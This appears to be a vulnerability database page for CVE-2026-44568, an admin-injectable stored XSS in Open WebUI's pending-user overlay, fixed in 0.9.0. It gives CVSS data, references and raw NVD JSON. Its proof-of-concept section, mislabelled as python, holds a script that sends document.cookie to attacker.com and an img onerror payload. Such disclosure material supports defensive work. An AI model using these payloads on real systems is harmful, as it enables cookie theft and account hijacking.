CVE-2026-44568

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the AccountPending.svelte component renders the admin-configured "Pending User Overlay Content" using marked.parse() inside {@html} with an incorrect DOMPurify application order. An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC for CVE-2026-44568
Admin injects the following payload into the "Pending User Overlay Content" configuration field.
-->
<script>
  // Example: Steal the pending user's cookies
  fetch('https://attacker.com/log?' + encodeURIComponent(document.cookie))
    .then(response => console.log('Data exfiltrated'));
</script>

<!-- Alternatively, using an image tag if script tags are filtered by basic browser parsing but execution still occurs via event handlers -->
<img src=x onerror="alert('XSS via CVE-2026-44568'); console.log(document.cookie);">

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44568
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44568
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44568/
[4] VulDB https://vuldb.com/cve/CVE-2026-44568
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc
[6] https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44568", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:48.263", "lastModified": "2026-05-15T21:16:36.277", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the AccountPending.svelte component renders the admin-configured \"Pending User Overlay Content\" using marked.parse() inside {@html} with an incorrect DOMPurify application order. An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}